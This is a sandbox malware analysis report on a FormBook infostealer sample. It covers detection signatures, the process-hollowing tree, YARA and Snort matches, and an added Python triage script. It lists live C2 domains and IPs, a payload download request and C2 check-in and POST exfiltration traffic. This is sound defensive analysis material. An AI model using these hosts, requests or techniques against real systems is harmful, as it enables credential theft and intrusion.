Windows Analysis Report
SC_0017384.exe

Overview

General Information

Sample Name:SC_0017384.exe
Analysis ID:831200
MD5:f296a60e1568722b060de70b46357fe6
SHA1:e24c65bd02d435c6b5705e9a01442e0447b77e22
SHA256:661f40c3448fa2acbddfd8297c54733b9f2d9c71e15506a4fba876a25d279e76
Tags:exe

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Encrypted powershell cmdline option found
Machine Learning detection for sample
Injects a PE file into a foreign processes
Yara detected Generic Downloader
Queues an APC in another process (thread injection)
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • SC_0017384.exe (PID: 5876 cmdline: C:\Users\user\Desktop\SC_0017384.exe MD5: F296A60E1568722B060DE70B46357FE6)
    • powershell.exe (PID: 5040 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • SC_0017384.exe (PID: 5956 cmdline: C:\Users\user\Desktop\SC_0017384.exe MD5: F296A60E1568722B060DE70B46357FE6)
      • explorer.exe (PID: 3324 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • Lvdnyvcvr.exe (PID: 6136 cmdline: "C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe" MD5: F296A60E1568722B060DE70B46357FE6)
          • powershell.exe (PID: 4504 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
            • conhost.exe (PID: 6048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • Lvdnyvcvr.exe (PID: 1980 cmdline: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe MD5: F296A60E1568722B060DE70B46357FE6)
        • systray.exe (PID: 5568 cmdline: C:\Windows\SysWOW64\systray.exe MD5: 1373D481BE4C8A6E5F5030D2FB0A0C68)
        • Lvdnyvcvr.exe (PID: 1436 cmdline: "C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe" MD5: F296A60E1568722B060DE70B46357FE6)
          • powershell.exe (PID: 6116 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
            • conhost.exe (PID: 572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • Lvdnyvcvr.exe (PID: 5300 cmdline: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe MD5: F296A60E1568722B060DE70B46357FE6)
  • cleanup
No configs have been found
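The process tree above is the whole infection chain in one picture: the submitted sample launches itself a second time (the suspended instance that process hollowing needs), explorer.exe and then systray.exe appear under that hollowed instance, the same MD5 reappears as Lvdnyvcvr.exe under AppData\Roaming, and every stage spawns a powershell.exe whose only argument is a base64 blob behind -ENC. The Python below is an added example and not part of the Joe Sandbox report: it parses the tree text as printed above (conhost.exe lines dropped), decodes the -ENC arguments the way PowerShell does (base64 of UTF-16LE, not UTF-8), and flags the self-spawn and the renamed copies. The function names, the two-spaces-per-level indentation rule and the heuristics are mine; the PIDs, paths, hashes and the encoded string are copied from the tree.

```python
"""Triage helpers for the Joe Sandbox process tree above.

Added example, not part of the report. It parses the tree text, decodes the
PowerShell -EncodedCommand arguments, and flags two behaviours the signature
list describes: a process re-launching its own image (the suspended second
instance used for process hollowing) and the sample's hash running under a new
name and path (the copy dropped for persistence). Names and thresholds are mine.
"""
import base64
import re

SAMPLE_MD5 = "F296A60E1568722B060DE70B46357FE6"
ENC = "cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA=="
PS = r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"'

# Constructed copy of the tree shown above (conhost.exe children omitted).
TREE = r"""
• SC_0017384.exe (PID: 5876 cmdline: C:\Users\user\Desktop\SC_0017384.exe MD5: F296A60E1568722B060DE70B46357FE6)
  • powershell.exe (PID: 5040 cmdline: %PS% -ENC %ENC% MD5: DBA3E6449E97D4E3DF64527EF7012A10)
  • SC_0017384.exe (PID: 5956 cmdline: C:\Users\user\Desktop\SC_0017384.exe MD5: F296A60E1568722B060DE70B46357FE6)
    • explorer.exe (PID: 3324 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • Lvdnyvcvr.exe (PID: 6136 cmdline: "C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe" MD5: F296A60E1568722B060DE70B46357FE6)
        • powershell.exe (PID: 4504 cmdline: %PS% -ENC %ENC% MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • Lvdnyvcvr.exe (PID: 1980 cmdline: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe MD5: F296A60E1568722B060DE70B46357FE6)
      • systray.exe (PID: 5568 cmdline: C:\Windows\SysWOW64\systray.exe MD5: 1373D481BE4C8A6E5F5030D2FB0A0C68)
      • Lvdnyvcvr.exe (PID: 1436 cmdline: "C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe" MD5: F296A60E1568722B060DE70B46357FE6)
        • powershell.exe (PID: 6116 cmdline: %PS% -ENC %ENC% MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • Lvdnyvcvr.exe (PID: 5300 cmdline: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe MD5: F296A60E1568722B060DE70B46357FE6)
""".replace("%PS%", PS).replace("%ENC%", ENC)

LINE = re.compile(r'^(\s*)• (\S+) \(PID: (\d+) cmdline: (.*) MD5: ([0-9A-Fa-f]{32})\)$')


def image_path(cmdline):
    """First token of a command line, unquoted and lower-cased."""
    m = re.match(r'"([^"]*)"|(\S+)', cmdline)
    return (m.group(1) or m.group(2)).lower()


def parse_tree(text):
    """{pid: {...}} from the indented tree; parent = nearest shallower line."""
    procs, ancestors = {}, []          # ancestors: (depth, pid) of open branches
    for line in text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        indent, name, pid, cmdline, md5 = m.groups()
        depth, pid = len(indent) // 2, int(pid)
        while ancestors and ancestors[-1][0] >= depth:
            ancestors.pop()
        procs[pid] = {"name": name, "ppid": ancestors[-1][1] if ancestors else None,
                      "cmdline": cmdline, "image": image_path(cmdline), "md5": md5.upper()}
        ancestors.append((depth, pid))
    return procs


def decode_encoded_command(cmdline):
    """Decode the value after -e/-ec/-enc/-EncodedCommand: base64 of UTF-16LE.
    Returns None when no such switch is present or the value is not valid."""
    tokens = re.findall(r'"[^"]*"|\S+', cmdline)
    for flag, value in zip(tokens, tokens[1:]):
        f = flag.lower()
        if f.startswith("-") and len(f) > 1 and "encodedcommand".startswith(f[1:]):
            try:
                return base64.b64decode(value, validate=True).decode("utf-16-le")
            except ValueError:           # binascii.Error and UnicodeDecodeError
                return None
    return None


def self_spawns(procs):
    """PIDs whose image and hash equal their parent's: hollowing candidates."""
    return sorted(pid for pid, p in procs.items() if p["ppid"] in procs
                  and procs[p["ppid"]]["image"] == p["image"]
                  and procs[p["ppid"]]["md5"] == p["md5"])


def renamed_copies(procs, sample_md5):
    """Image paths other than the submitted one that run the sample's bytes."""
    original = {p["image"] for p in procs.values() if p["ppid"] is None and p["md5"] == sample_md5}
    return sorted({p["image"] for p in procs.values()
                   if p["md5"] == sample_md5 and p["image"] not in original})


def encoded_commands(procs):
    """{pid: decoded command} for every process carrying an encoded command."""
    found = {pid: decode_encoded_command(p["cmdline"]) for pid, p in procs.items()}
    return {pid: cmd for pid, cmd in found.items() if cmd is not None}


if __name__ == "__main__":
    procs = parse_tree(TREE)
    print("self-spawned (hollowing candidates):", self_spawns(procs))
    print("sample hash under other paths:", renamed_copies(procs, SAMPLE_MD5))
    for pid, cmd in encoded_commands(procs).items():
        print(f"powershell pid {pid} -ENC decodes to: {cmd!r}")
```

All three -ENC blobs decode to the same `start-sleep -seconds 20`: a 20-second stall, which is what the "Encrypted powershell cmdline option found" signature is pointing at and one of the reasons the sleep-based evasion signatures fire. The self-spawn hits (5956, 1980, 5300) are the suspended second instances behind "Creates a process in suspended mode" and "Sample uses process hollowing technique"; explorer.exe and systray.exe sitting under the hollowed instance is consistent with injection into those processes, and it is explorer.exe that carries the C2 traffic in the Networking section. When hunting, the durable indicator is not the random names Jqtuyob\Lvdnyvcvr.exe but the pattern: the original hash executing from a fresh directory under AppData\Roaming, re-launching itself, and spawning an encoded PowerShell sleep.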
Memory dump YARA matches (Source / Rule / Description / Author / Strings):
Source: 00000008.00000002.575645185.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp | Rule: JoeSecurity_FormBook_1 | Description: Yara detected FormBook | Author: Joe Security
Source: 00000008.00000002.575645185.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp | Rule: Windows_Trojan_Formbook_1112e116 | Description: unknown | Author: unknown
  • 0x1f060:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0xae1f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 0x18267:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
Source: 00000008.00000002.575645185.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  • 0x18065:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x17b01:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x18167:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x182df:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa9ea:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x16d5c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x1de07:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1edba:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 00000003.00000002.430971378.0000000001150000.00000040.10000000.00040000.00000000.sdmp | Rule: JoeSecurity_FormBook_1 | Description: Yara detected FormBook | Author: Joe Security
Source: 00000003.00000002.430971378.0000000001150000.00000040.10000000.00040000.00000000.sdmp | Rule: Windows_Trojan_Formbook_1112e116 | Description: unknown | Author: unknown
  • 0x1f060:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0xae1f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 0x18267:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
(11 further memory dump entries not shown)
Unpacked PE YARA matches (Source / Rule / Description / Author / Strings):
Source: 3.2.SC_0017384.exe.400000.0.raw.unpack | Rule: JoeSecurity_FormBook_1 | Description: Yara detected FormBook | Author: Joe Security
Source: 3.2.SC_0017384.exe.400000.0.raw.unpack | Rule: Windows_Trojan_Formbook_1112e116 | Description: unknown | Author: unknown
  • 0x20de3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0xcba2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 0x19fea:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
Source: 3.2.SC_0017384.exe.400000.0.raw.unpack | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  • 0x19de8:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x19884:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x19eea:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1a062:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xc76d:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x18adf:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x1fb8a:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x20b3d:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 3.2.SC_0017384.exe.400000.0.unpack | Rule: JoeSecurity_FormBook_1 | Description: Yara detected FormBook | Author: Joe Security
Source: 3.2.SC_0017384.exe.400000.0.unpack | Rule: Windows_Trojan_Formbook_1112e116 | Description: unknown | Author: unknown
  • 0x1ffe3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0xbda2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 0x191ea:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
(3 further unpacked PE entries not shown)
          No Sigma rule has matched
          Snort IDS alerts (Source -> Destination | SID | Rule | Timestamp | Protocol | Classtype):
          192.168.2.5:49710 -> 172.67.194.225:80 | SID 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 03/21/23-09:12:13.411086 | TCP | A Network Trojan was detected
          192.168.2.5:49702 -> 74.208.236.131:80 | SID 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 03/21/23-09:11:27.575244 | TCP | A Network Trojan was detected
          192.168.2.5:49702 -> 74.208.236.131:80 | SID 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 03/21/23-09:11:27.575244 | TCP | A Network Trojan was detected
          192.168.2.5:49702 -> 74.208.236.131:80 | SID 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 03/21/23-09:11:27.575244 | TCP | A Network Trojan was detected
          192.168.2.5:49710 -> 172.67.194.225:80 | SID 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 03/21/23-09:12:13.411086 | TCP | A Network Trojan was detected
          192.168.2.5:49710 -> 172.67.194.225:80 | SID 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 03/21/23-09:12:13.411086 | TCP | A Network Trojan was detected


          AV Detection

          Source: SC_0017384.exe | ReversingLabs: Detection: 12%
          Source: SC_0017384.exe | Virustotal: Detection: 17%
          Source: Yara match | File source: 3.2.SC_0017384.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 3.2.SC_0017384.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000008.00000002.575645185.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.430971378.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.430398181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000008.00000002.577052861.0000000004CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000008.00000002.577203879.0000000004D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe | ReversingLabs: Detection: 12%
          Source: SC_0017384.exe | Joe Sandbox ML: detected
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe | Joe Sandbox ML: detected
          Source: 3.2.SC_0017384.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
          Source: SC_0017384.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: unknown | HTTPS traffic detected: 188.40.83.211:443 -> 192.168.2.5:49698 version: TLS 1.2
          Source: unknown | HTTPS traffic detected: 188.40.83.211:443 -> 192.168.2.5:49700 version: TLS 1.2
          Source: unknown | HTTPS traffic detected: 188.40.83.211:443 -> 192.168.2.5:49701 version: TLS 1.2
          Source: SC_0017384.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: SC_0017384.exe, 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, SC_0017384.exe, 00000003.00000003.381474937.000000000140D000.00000004.00000020.00020000.00000000.sdmp, SC_0017384.exe, 00000003.00000003.383573088.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000008.00000002.578982568.00000000051DF000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000008.00000002.578982568.00000000050C0000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000008.00000003.433202218.0000000004F20000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000008.00000003.430554668.0000000004D83000.00000004.00000020.00020000.00000000.sdmp, Lvdnyvcvr.exe, 0000000E.00000002.548095343.0000000001520000.00000040.00001000.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000010.00000002.567296609.00000000013B0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: SC_0017384.exe, SC_0017384.exe, 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, SC_0017384.exe, 00000003.00000003.381474937.000000000140D000.00000004.00000020.00020000.00000000.sdmp, SC_0017384.exe, 00000003.00000003.383573088.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000008.00000002.578982568.00000000051DF000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000008.00000002.578982568.00000000050C0000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000008.00000003.433202218.0000000004F20000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000008.00000003.430554668.0000000004D83000.00000004.00000020.00020000.00000000.sdmp, Lvdnyvcvr.exe, 0000000E.00000002.548095343.0000000001520000.00000040.00001000.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000010.00000002.567296609.00000000013B0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256 source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp

          Networking

          Source: C:\Windows\explorer.exe | Network Connect: 54.85.86.211 80
          Source: C:\Windows\explorer.exe | Domain query: www.myprojoints.com
          Source: C:\Windows\explorer.exe | Network Connect: 172.67.152.24 80
          Source: C:\Windows\explorer.exe | Network Connect: 74.208.236.131 80
          Source: C:\Windows\explorer.exe | Network Connect: 217.160.0.229 80
          Source: C:\Windows\explorer.exe | Domain query: www.metatv.app
          Source: C:\Windows\explorer.exe | Domain query: www.findmyoriginstory.com
          Source: C:\Windows\explorer.exe | Domain query: www.brunaeleandro.com
          Source: C:\Windows\explorer.exe | Domain query: www.madisoncountylincoln.com
          Source: C:\Windows\explorer.exe | Network Connect: 172.67.194.225 80
          Source: C:\Windows\explorer.exe | Domain query: www.emprendizajesocial.com
          Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49702 -> 74.208.236.131:80
          Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49702 -> 74.208.236.131:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49702 -> 74.208.236.131:80
          Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49710 -> 172.67.194.225:80
          Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49710 -> 172.67.194.225:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49710 -> 172.67.194.225:80
          Source: Yara match | File source: 0.2.SC_0017384.exe.6980000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.SC_0017384.exe.486b570.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000000.00000002.401744017.0000000006980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Joe Sandbox View | ASN Name: AMAZON-AESUS AMAZON-AESUS
          Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: global traffic | HTTP traffic detected: GET /fwvfviJb.dat HTTP/1.1 | Host: a.uguu.se | Connection: Keep-Alive
          Source: global traffic | HTTP traffic detected: GET /fwvfviJb.dat HTTP/1.1 | Host: a.uguu.se | Connection: Keep-Alive
          Source: global traffic | HTTP traffic detected: GET /fwvfviJb.dat HTTP/1.1 | Host: a.uguu.se | Connection: Keep-Alive
          Source: global traffic | HTTP traffic detected: GET /t4np/?LAIu=TchAG45&ekDWdXmx=yKIXTmp5dZbzu0kOoimFYUx0Rf1qUZs10N2udgS/CtBUsUx15VFtNYN9iDnYFh77a6AF4rH5pFyFnuGOqSZvoPy3IjvUZKwOXw== HTTP/1.1 | Host: www.findmyoriginstory.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /t4np/?LAIu=TchAG45&ekDWdXmx=gQIyGWpAOrsnJd0q1zycF3dboTDh0JHEHzF0+87QMzSWBZus6QBaVJZOvsOvWQQjPhLlWjZ0Xc16UyU8zopwRBvkYI23apdf5g== HTTP/1.1 | Host: www.emprendizajesocial.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /t4np/?ekDWdXmx=TNgCDQM1NseJ/EyvbqZD4bEVgDXmfsqsK09kjaHK361RIlxqLtgkaoztB9HOqO+kj7AmSjC7tsKJawScM9XI/2xtyFPsJZxirw==&LAIu=TchAG45 HTTP/1.1 | Host: www.brunaeleandro.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /t4np/?LAIu=TchAG45&ekDWdXmx=b7otzynn0HmortmfwUeY4rOKK/wDsahaMH4CpYcAMUMZFiGwLHjB+0Oq1wXjzAJPnkBdjV2xmRY1HYDRMeq0YWMvPw2aK61dkA== HTTP/1.1 | Host: www.madisoncountylincoln.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /t4np/?ekDWdXmx=yN4s0tXHCEK4GbHOxK129Y7foRrzq40ElafmJhvJj1LcshAib7Ivom6LHCQSa6JmmrJNk5dNV7FfRE38dwcSsWQdgWRuTjAoEA==&LAIu=TchAG45 HTTP/1.1 | Host: www.metatv.app | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: Joe Sandbox View | IP Address: 54.85.86.211 54.85.86.211
          Source: global trafficHTTP traffic detected: POST /t4np/ HTTP/1.1Host: www.emprendizajesocial.comConnection: closeContent-Length: 190Cache-Control: no-cacheOrigin: http://www.emprendizajesocial.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.emprendizajesocial.com/t4np/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 65 6b 44 57 64 58 6d 78 3d 74 53 67 53 46 6d 4e 55 59 35 38 65 4d 74 73 57 28 58 79 41 56 6c 64 6e 39 42 43 72 31 71 54 51 4f 42 64 6a 6d 49 44 54 4d 68 32 50 45 5a 4c 71 36 69 4d 32 64 4a 77 4c 36 38 32 47 5a 43 64 78 48 68 48 46 55 56 5a 5a 58 4e 70 61 59 45 52 61 28 74 4a 48 54 42 48 4e 59 5a 4b 68 56 73 68 45 79 6f 4d 30 5a 48 4a 59 56 54 6e 61 46 7a 4f 55 38 65 57 49 46 48 4a 63 6b 32 41 63 71 31 6e 62 6f 6c 33 44 77 6a 56 36 50 5a 46 42 33 5a 69 37 34 42 42 65 68 63 6e 44 7e 4b 41 56 6f 69 37 75 55 48 48 44 47 6d 62 76 41 4c 63 4a 36 45 64 55 4a 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: ekDWdXmx=tSgSFmNUY58eMtsW(XyAVldn9BCr1qTQOBdjmIDTMh2PEZLq6iM2dJwL682GZCdxHhHFUVZZXNpaYERa(tJHTBHNYZKhVshEyoM0ZHJYVTnaFzOU8eWIFHJck2Acq1nbol3DwjV6PZFB3Zi74BBehcnD~KAVoi7uUHHDGmbvALcJ6EdUJQ).
          Source: global trafficHTTP traffic detected: POST /t4np/ HTTP/1.1Host: www.brunaeleandro.comConnection: closeContent-Length: 190Cache-Control: no-cacheOrigin: http://www.brunaeleandro.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.brunaeleandro.com/t4np/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 65 6b 44 57 64 58 6d 78 3d 65 50 49 69 41 6e 77 2d 54 66 4f 72 6f 48 65 71 66 5f 35 72 68 4b 6c 74 30 78 4b 32 4c 4d 79 66 4f 56 4e 53 32 75 66 5a 77 73 78 37 43 32 42 35 49 76 34 33 57 6f 6d 51 58 76 7e 58 67 71 37 4a 70 4d 49 68 52 79 53 6e 36 36 36 67 66 51 54 47 4f 38 6e 6b 33 68 39 4b 30 30 58 59 44 5f 42 34 68 36 4e 38 4f 6f 6a 5a 4c 4f 35 69 53 36 63 51 48 36 74 6c 4b 63 77 74 59 46 78 55 56 61 51 75 69 51 46 6e 59 48 69 75 65 6d 55 63 72 53 4d 37 47 51 6b 6a 30 50 46 70 6c 39 36 47 6f 52 45 7a 35 33 39 39 4e 38 58 70 6e 43 54 63 66 74 6d 51 73 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: ekDWdXmx=ePIiAnw-TfOroHeqf_5rhKlt0xK2LMyfOVNS2ufZwsx7C2B5Iv43WomQXv~Xgq7JpMIhRySn666gfQTGO8nk3h9K00XYD_B4h6N8OojZLO5iS6cQH6tlKcwtYFxUVaQuiQFnYHiuemUcrSM7GQkj0PFpl96GoREz5399N8XpnCTcftmQsw).
